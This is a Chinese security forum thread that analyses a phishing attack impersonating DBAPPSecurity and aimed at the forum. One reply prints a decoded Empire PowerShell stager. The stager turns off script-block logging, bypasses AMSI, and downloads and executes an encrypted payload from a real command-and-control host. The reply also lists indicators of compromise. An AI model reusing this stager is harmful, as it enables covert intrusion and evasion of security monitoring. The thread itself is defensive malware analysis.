能力值:
( LV2,RANK:10 )
|
-
-
2 楼
先不说技术,这个中文看着像是机器翻译的。。。
|
能力值:
(RANK:350 )
|
-
-
3 楼
第一封邮件冒充安恒公司,下面还有一个安恒的logo。 安恒的官网是:https://www.dbappsecurity.com.cn/
|
能力值:
( LV3,RANK:20 )
|
-
-
4 楼
其实是中国人, 故意用机翻, 假冒自己是外国人
|
能力值:
( LV9,RANK:450 )
|
-
-
5 楼
恶意代码是powershell payload,使用的是Empire项目生成的payload,解码后如下: IF($PSVErSIoNTABLe.PSVerSion.MAJor -ge 3){$GPS=[rEf].AssEmBLY.GetTYPe('System.Management.Automation.Utils')."GetFiE`Ld"('cachedGroupPolicySettings','N'+'onPublic,Static').GETVaLUe($nulL);If($GPS['ScriptB'+'lockLogging']){$GPS['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;$GPS['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}ElsE{[SCrIpTBLock]."GeTFIE`Ld"('signatures','N'+'onPublic,Static').SetVALuE($Null,(NEW-ObjecT COLlectionS.GEnEriC.HaShSEt[sTRInG]))}[REf].ASSeMBLy.GetTypE('System.Management.Automation.AmsiUtils')|?{$_}|%{$_.GetFIELD('amsiInitFailed','NonPublic,Static').SETVaLUE($nuLl,$TrUe)};};[SySTem.NEt.ServICePoinTMANAGer]::ExPecT100CONtinUe=0;$wC=NeW-ObjECT SySTEM.NeT.WEbCLiEnt;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';$wc.HEadERS.Add('User-Agent',$u);$wc.PROxY=[SyStEm.NeT.WeBREQuEST]::DefAultWeBPROXY;$wC.PRoxy.CReDenTiALS = [SySTEM.NEt.CredEntiAlCACHe]::DEfaultNEtWORKCrEdEnTialS;$Script:Proxy = $wc.Proxy;$K=[SYStem.TexT.ENCODInG]::ASCII.GeTByTES('.};Pw5=?crvu0~mikL#*&_%qOFHREj:|');$R={$D,$K=$ARGs;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.COuNt])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bxOr$S[($S[$I]+$S[$H])%256]}};$ser='http://www2.netstorehosting.com:80';$t='/login/process.php';$WC.HEAdERs.ADd("Cookie","session=szQQtljIH3ITKRUXhK+5KeXNHE8=");$DATa=$WC.DOwnlOAdDAtA($sER+$T);$iv=$data[0..3];$dAtA=$DATA[4..$DAtA.LEngtH];-join[CHaR[]](& $R $dATA ($IV+$K))|IEX IOC 如下: url http://www.dbappsecurtiy.com/pediy/error.hta sha256 93b1707cbe27f7f515c089b6896591df616ce8c37b9fbbe932337f9531e20d57 sha1 f49d99a94c4c643270578106ef39f0f07f2696c8 md5 584437bc8063b64fb65d2882a7ddbd89 domain www2.netstorehosting.com ip 45.89.175.192
|
能力值:
( LV2,RANK:10 )
|
-
-
6 楼
是冒充安恒的钓鱼链接,安恒是dbappsecu rity ,链接中是dbappsecu rtiy
|
能力值:
( LV2,RANK:10 )
|
-
-
7 楼
钓鱼安全论坛管理 怎么想的
|
能力值:
( LV12,RANK:530 )
|
-
-
8 楼
最后于 2019-11-5 14:49
被熊猫正正编辑
,原因:
|
能力值:
( LV4,RANK:50 )
|
-
-
9 楼
我就“傻傻”地直接在Chrome上打开了链接,可惜标红拦截了。。哎,失望。。
|
能力值:
( LV2,RANK:10 )
|
-
-
10 楼
熊猫正正
冒充安恒信息对看雪论坛的一次定向钓鱼攻击 https://mp.weixin.qq.com/s/59y2pG0XnjDY49ogjcE_mA
这波分析是真的快,
|
能力值:
( LV6,RANK:80 )
|
-
-
11 楼
坛主用的是Mac,对坛主进行apt攻击失败。
|
能力值:
( LV2,RANK:10 )
|
-
-
12 楼
Freebuf上发了这帖子出来..针对看雪的钓鱼..好像也没说出个所以然 .23333
|
|
|